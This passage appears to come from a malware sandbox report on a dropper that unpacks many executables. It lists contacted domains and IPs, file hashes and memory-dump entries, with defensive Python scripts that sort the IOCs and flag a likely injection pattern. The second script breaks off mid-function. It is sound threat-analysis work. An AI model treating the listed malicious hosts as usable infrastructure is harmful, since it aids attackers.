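# the Domain column is empty for direct-to-IP connections.
NETWORK_ROWS = """\
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 mooorni.xyz udp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 telegatt.top udp
AU 103.224.212.220:443 www.listincode.com tcp
N/A 127.0.0.1:49298 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
NL 212.193.30.115:80 212.193.30.115 tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 telegka.top udp
"""

ROW = re.compile(
    r"^(?P<cc>\S+)\s+(?P<ip>[\d.]+):(?P<port>\d+)\s+(?:(?P<domain>\S+)\s+)?(?P<proto>tcp|udp)$"
)

# Assumed: the public services this report's signature most plausibly fired on.
LEGIT_HOSTING = {"cdn.discordapp.com", "pastebin.com", "iplogger.org"}
WEB_PORTS = {"80", "443"}


def parse_rows(text):
    """Parse the sandbox table into dicts; lines that do not fit are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            rows.append(m.groupdict())
    return rows


def is_ip(s):
    return re.fullmatch(r"[\d.]+", s or "") is not None


def summarize(rows):
    """Split the rows into the buckets an analyst carries into blocklists."""
    resolved, connected = set(), defaultdict(set)
    direct_ip, unusual_ports = set(), set()
    for r in rows:
        dest = f"{r['ip']}:{r['port']}"
        if r["ip"].startswith("127."):          # sandbox loopback, ignore
            continue
        if r["proto"] == "udp" and r["port"] == "53" and r["domain"]:
            resolved.add(r["domain"])           # a DNS query, not a connection
            continue
        if r["domain"] and not is_ip(r["domain"]):
            connected[r["domain"]].add(dest)
        else:
            direct_ip.add(dest)                 # no name: hard-coded host
        if r["port"] not in WEB_PORTS:
            unusual_ports.add(dest)
    return {
        "resolved_only": resolved - set(connected),
        "connected": {d: sorted(v) for d, v in connected.items()},
        "direct_ip": direct_ip,
        "unusual_ports": unusual_ports,
        "legit_hosting": set(connected) & LEGIT_HOSTING,
    }


if __name__ == "__main__":
    for key, value in summarize(parse_rows(NETWORK_ROWS)).items():
        print(f"{key:14s} {value}")
```

Resolved-only names (mooorni.xyz, telegatt.top, telegka.top, all-mobile-pa1ments.com.mx) are typical of a loader trying a list of infrastructure that was already down or sinkholed at detonation time; they are still IOCs, just not ones you can confirm from this run's traffic.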

Files

memory/892-54-0x0000000075831000-0x0000000075833000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe

MD5 469c30e8243cecd8e84d75e1de71cccc
SHA1 b128e2681c294d318cfbd2e45cdafc0407b4135b
SHA256 40e6b756ed4ed0bde5d204eb9842e7d8a48a2e3b528f27952c4c9238aa6685c8
SHA512 d02b2308a0ed03357239f9f886037475c79250ec52e279d606a756b693f9a0fd2f378bbade307ee09c2b21a9bba5e524c2b6400ba43c2bd4ab3b48fa39e64a30

memory/1260-58-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe

MD5 469c30e8243cecd8e84d75e1de71cccc
SHA1 b128e2681c294d318cfbd2e45cdafc0407b4135b
SHA256 40e6b756ed4ed0bde5d204eb9842e7d8a48a2e3b528f27952c4c9238aa6685c8
SHA512 d02b2308a0ed03357239f9f886037475c79250ec52e279d606a756b693f9a0fd2f378bbade307ee09c2b21a9bba5e524c2b6400ba43c2bd4ab3b48fa39e64a30

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

\Users\Admin\AppData\Local\Temp\7zSC735351C\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

\Users\Admin\AppData\Local\Temp\7zSC735351C\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

\Users\Admin\AppData\Local\Temp\7zSC735351C\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

\Users\Admin\AppData\Local\Temp\7zSC735351C\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zSC735351C\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/1260-76-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1260-75-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1260-77-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1260-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1260-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1260-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1260-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1260-82-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1260-83-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/820-84-0x0000000000000000-mapping.dmp

memory/1288-85-0x0000000000000000-mapping.dmp

memory/1924-88-0x0000000000000000-mapping.dmp

memory/1920-89-0x0000000000000000-mapping.dmp

memory/1260-92-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1260-93-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1260-94-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1260-95-0x0000000064940000-0x0000000064959000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 453404015415509cb7ad841553582d3e
SHA1 760958ad816fcb9624018a1c28cc04800ccb6682
SHA256 234919119c34ab4e198d22a6e22c34a33d46f3d6b13f7070aac802c5fcd583b1
SHA512 9b244ba2d9ee8211f6a524224b4891daf6108149c1c76a189d0165868c94fe93127d881223a7cd56cdd1a237a91dabfd0145539dd9d90fa98f7af2aef4644114

memory/392-97-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19c43a743a35.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

memory/1508-99-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b6650547.exe

MD5 3e1cd5a1acf5ce17029d6aa9642ed115
SHA1 858af14318e1811a4d64646a6e062fd42a114ea8
SHA256 a988b93159c8e60e09f6458324885813af93e624429dcf99ac5b852e44ab99e5
SHA512 25204d025f730086dc5c2c64e935a750f232f8157559a0e0bcecdd721bc6398d393ba615dd227a41ddeac1cbac2586464c309acf760172e293f2355b4ecd1473

memory/884-103-0x0000000000000000-mapping.dmp

memory/268-106-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b6650547.exe

MD5 3e1cd5a1acf5ce17029d6aa9642ed115
SHA1 858af14318e1811a4d64646a6e062fd42a114ea8
SHA256 a988b93159c8e60e09f6458324885813af93e624429dcf99ac5b852e44ab99e5
SHA512 25204d025f730086dc5c2c64e935a750f232f8157559a0e0bcecdd721bc6398d393ba615dd227a41ddeac1cbac2586464c309acf760172e293f2355b4ecd1473

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue196c8dc8316d5e.exe

MD5 c90e5a77dd1e7e03d51988bdb057bd9f
SHA1 498bd4b07d9e11133943e63c2cf06e28d9e99fc5
SHA256 cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54
SHA512 bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1922ecc1aaabd2.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

memory/952-117-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19053251dd9e13fe.exe

MD5 a4bf9671a96119f7081621c2f2e8807d
SHA1 47f50ae20bfa8b277f8c8c1963613d3f4c364b94
SHA256 d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7
SHA512 f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a

memory/1532-108-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19c43a743a35.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

memory/2040-110-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19053251dd9e13fe.exe

MD5 a4bf9671a96119f7081621c2f2e8807d
SHA1 47f50ae20bfa8b277f8c8c1963613d3f4c364b94
SHA256 d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7
SHA512 f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a

memory/792-113-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1967b2731eea4d.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

memory/1736-127-0x0000000000000000-mapping.dmp

memory/464-133-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue196c8dc8316d5e.exe

MD5 c90e5a77dd1e7e03d51988bdb057bd9f
SHA1 498bd4b07d9e11133943e63c2cf06e28d9e99fc5
SHA256 cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54
SHA512 bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1922ecc1aaabd2.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b1a112f2.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

memory/1380-124-0x0000000000000000-mapping.dmp

memory/240-119-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19ad8dd95e905.exe

MD5 c1bc0cca3a8784bbc7d5d3e9e47e6ba4
SHA1 500970243e0e1dd57e2aad4f372da395d639b4a3
SHA256 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1
SHA512 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5

memory/1028-148-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19581adec51f.exe

MD5 83552f70e7791687013e0b6e77eef7f4
SHA1 ae6e0e3f2873dd234b4813d4c6a47364111dec8a
SHA256 72e3a9de1b4e4d7f3fc08a1e3071bfa7da14a79eb23fe54f47d6e4c38b3a5c84
SHA512 969b5a9128c5ffff270e0019b5e1bc7b5cd250bf367e7c022aceac0e1496eedf50c657a52083416999ebf59a4eb57827306924febebae1ee9a833a6ad1b5b5c9

memory/964-155-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b1a112f2.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

memory/1000-150-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19862f0a4c.exe

MD5 26278caf1df5ef5ea045185380a1d7c9
SHA1 df16e31d1dd45dc4440ec7052de2fc026071286c
SHA256 d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5
SHA512 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03

memory/1320-145-0x0000000000000000-mapping.dmp

memory/1552-157-0x0000000000000000-mapping.dmp

memory/1596-160-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19ad8dd95e905.exe

MD5 c1bc0cca3a8784bbc7d5d3e9e47e6ba4
SHA1 500970243e0e1dd57e2aad4f372da395d639b4a3
SHA256 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1
SHA512 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5

memory/1144-175-0x0000000000000000-mapping.dmp

memory/1624-184-0x0000000000000000-mapping.dmp

memory/1756-187-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19896d3ece3b4.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1984208f692605cf.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

memory/1784-180-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue199b79a9228e.exe

MD5 0b67130e7f04d08c78cb659f54b20432
SHA1 669426ae83c4a8eacf207c7825168aca30a37ca2
SHA256 bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac
SHA512 8f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79

memory/708-189-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19581adec51f.exe

MD5 83552f70e7791687013e0b6e77eef7f4
SHA1 ae6e0e3f2873dd234b4813d4c6a47364111dec8a
SHA256 72e3a9de1b4e4d7f3fc08a1e3071bfa7da14a79eb23fe54f47d6e4c38b3a5c84
SHA512 969b5a9128c5ffff270e0019b5e1bc7b5cd250bf367e7c022aceac0e1496eedf50c657a52083416999ebf59a4eb57827306924febebae1ee9a833a6ad1b5b5c9

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19de85da9de6.exe

MD5 0c4602580c43df3321e55647c7c7dfdb
SHA1 5e4c40d78db55305ac5a30f0e36a2e84f3849cd1
SHA256 fa02543c043d0ca718baf3dfafb7f5d0c018d46ee6e0f0220095e5874f160752
SHA512 02042264bc14c72c1e8e785812b81dad218e2ecf357db5497e80eabc739c4ad7d9176b6a9e061b909dac1ea188a7ca9e3b1c610c97d52e020ccd947f286dbe11

memory/1452-171-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1984208f692605cf.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

memory/1160-169-0x0000000000000000-mapping.dmp

memory/1428-164-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19862f0a4c.exe

MD5 26278caf1df5ef5ea045185380a1d7c9
SHA1 df16e31d1dd45dc4440ec7052de2fc026071286c
SHA256 d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5
SHA512 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03

memory/1708-192-0x0000000000000000-mapping.dmp

memory/1876-194-0x0000000000000000-mapping.dmp

memory/708-197-0x0000000001040000-0x0000000001048000-memory.dmp

memory/1708-198-0x00000000008D0000-0x0000000000940000-memory.dmp

memory/952-199-0x0000000001380000-0x00000000013F0000-memory.dmp

memory/1428-200-0x00000000002D0000-0x00000000002E8000-memory.dmp

memory/1700-201-0x0000000000000000-mapping.dmp

memory/1520-202-0x0000000000000000-mapping.dmp

memory/1924-204-0x00000000730D0000-0x000000007367B000-memory.dmp

memory/1920-205-0x00000000730D0000-0x000000007367B000-memory.dmp

memory/1596-206-0x0000000001B20000-0x0000000001BAE000-memory.dmp

memory/1596-207-0x0000000000400000-0x00000000016FB000-memory.dmp

memory/2056-208-0x0000000000000000-mapping.dmp

memory/1596-209-0x0000000000340000-0x000000000038F000-memory.dmp

memory/1428-211-0x00000000002A0000-0x00000000002A6000-memory.dmp

memory/2148-213-0x0000000000000000-mapping.dmp

memory/2136-212-0x0000000000000000-mapping.dmp

memory/2188-216-0x0000000000000000-mapping.dmp

memory/1924-218-0x00000000730D0000-0x000000007367B000-memory.dmp

memory/1920-219-0x00000000730D0000-0x000000007367B000-memory.dmp

memory/2236-220-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2248-223-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2236-222-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2248-227-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2236-226-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2236-228-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2236-232-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2236-234-0x000000000041B23E-mapping.dmp

memory/2248-233-0x000000000041B23E-mapping.dmp

memory/2248-231-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2248-230-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2364-229-0x0000000000000000-mapping.dmp

memory/2236-238-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2248-237-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2236-244-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2552-245-0x0000000000000000-mapping.dmp

memory/1260-247-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1596-248-0x0000000000340000-0x000000000038F000-memory.dmp

memory/2716-249-0x0000000000000000-mapping.dmp

memory/2772-251-0x0000000000000000-mapping.dmp

memory/2784-252-0x0000000000000000-mapping.dmp

memory/2808-255-0x0000000000000000-mapping.dmp

memory/2808-258-0x00000000024A0000-0x000000000254C000-memory.dmp

memory/2808-259-0x0000000002600000-0x00000000026AB000-memory.dmp

memory/792-260-0x00000000030D0000-0x00000000030D9000-memory.dmp

memory/792-261-0x0000000000250000-0x0000000000259000-memory.dmp

memory/792-262-0x0000000000400000-0x0000000002F02000-memory.dmp

memory/792-263-0x0000000000400000-0x0000000002F02000-memory.dmp

memory/2172-264-0x0000000000000000-mapping.dmp

memory/2284-266-0x0000000000000000-mapping.dmp
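The listing above reports the same dropped file once per write, under both `\Users\...` and `C:\Users\...`, and interleaves memory-dump entries. The script below is an added example (not code from the sandbox or from any family named in the report) that folds the entries into one row per SHA256, separates the MinGW-w64/libcurl runtime DLLs the loader ships beside its own binary from the dropped executables, and flags the pattern visible for PIDs 2236 and 2248: an identical `0x400000-0x422000` region dumped from two processes, each with a mapping entry inside that range. Reading that as one payload written into two child processes is an interpretation, consistent with the report's SetThreadContext and WriteProcessMemory signatures but not stated by it. The line layouts it parses are assumed from the listing, the `RUNTIME_DLLS` set is an assumption, and the sample is a constructed excerpt of the entries above with SHA512 lines omitted.

```python
"""Collapse repeated sandbox file entries into one row per unique file and
pick out memory-dump regions shared by several processes. Added example, not
code from the sandbox or from any family named in the report; the line
layouts parsed below are assumed from the listing above."""
import re
from collections import defaultdict

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512) ([0-9a-fA-F]+)$")
REGION_RE = re.compile(r"^memory/(\d+)-\d+-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
MAPPING_RE = re.compile(r"^memory/(\d+)-\d+-0x([0-9A-Fa-f]+)-mapping\.dmp$")

# MinGW-w64 and libcurl runtime DLLs dropped beside the loader (assumed list):
# support libraries, not payloads.
RUNTIME_DLLS = {"libwinpthread-1.dll", "libcurl.dll", "libcurlpp.dll",
                "libgcc_s_dw2-1.dll", "libstdc++-6.dll"}

# Constructed sample copied from the listing above (SHA512 lines omitted);
# setup_install.exe appears under both '\Users\...' and 'C:\Users\...'.
SAMPLE = r"""
\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe

MD5 469c30e8243cecd8e84d75e1de71cccc
SHA1 b128e2681c294d318cfbd2e45cdafc0407b4135b
SHA256 40e6b756ed4ed0bde5d204eb9842e7d8a48a2e3b528f27952c4c9238aa6685c8

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe

MD5 469c30e8243cecd8e84d75e1de71cccc
SHA1 b128e2681c294d318cfbd2e45cdafc0407b4135b
SHA256 40e6b756ed4ed0bde5d204eb9842e7d8a48a2e3b528f27952c4c9238aa6685c8

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

memory/2236-220-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2236-234-0x000000000041B23E-mapping.dmp
memory/2248-233-0x000000000041B23E-mapping.dmp
memory/2248-237-0x0000000000400000-0x0000000000422000-memory.dmp
memory/820-84-0x0000000000000000-mapping.dmp
"""

def normalise(path):
    """'\\Users\\x' and 'C:\\Users\\x' name the same file; drop the drive."""
    p = path.replace("/", "\\")
    if len(p) > 1 and p[1] == ":":
        p = p[2:]
    return p.lower()

def parse_listing(text):
    files = {}                    # sha256 -> {"paths": set, "hashes": dict}
    regions = defaultdict(list)   # pid -> [(start, end)]
    mappings = defaultdict(list)  # pid -> [address]
    current = None
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        if m := REGION_RE.match(line):
            regions[int(m[1])].append((int(m[2], 16), int(m[3], 16)))
            current = None
        elif m := MAPPING_RE.match(line):
            mappings[int(m[1])].append(int(m[2], 16))
            current = None
        elif m := HASH_RE.match(line):
            if current is None:   # hash line with no preceding path: skip
                continue
            current["hashes"][m[1]] = m[2]
            if m[1] == "SHA256":  # fold this entry into the one for the hash
                entry = files.setdefault(m[2], {"paths": set(), "hashes": {}})
                entry["paths"] |= current["paths"]
                entry["hashes"].update(current["hashes"])
                current = entry
        else:                     # anything else starts a new file entry
            current = {"paths": {normalise(line)}, "hashes": {}}
    return files, regions, mappings

def classify(files):
    """Split unique files into runtime DLLs, dropped executables and the rest."""
    out = {"runtime_dll": [], "dropped_exe": [], "other": []}
    for sha, e in files.items():
        name = min(e["paths"]).rsplit("\\", 1)[-1]
        kind = ("runtime_dll" if name in RUNTIME_DLLS
                else "dropped_exe" if name.endswith(".exe") else "other")
        out[kind].append((name, sha))
    return {k: sorted(v) for k, v in out.items()}

def shared_regions(regions, mappings):
    """Ranges dumped from two or more PIDs that each also have a mapping
    address inside the range: one payload placed into several processes."""
    by_region = defaultdict(set)
    for pid, ranges in regions.items():
        for r in ranges:
            by_region[r].add(pid)
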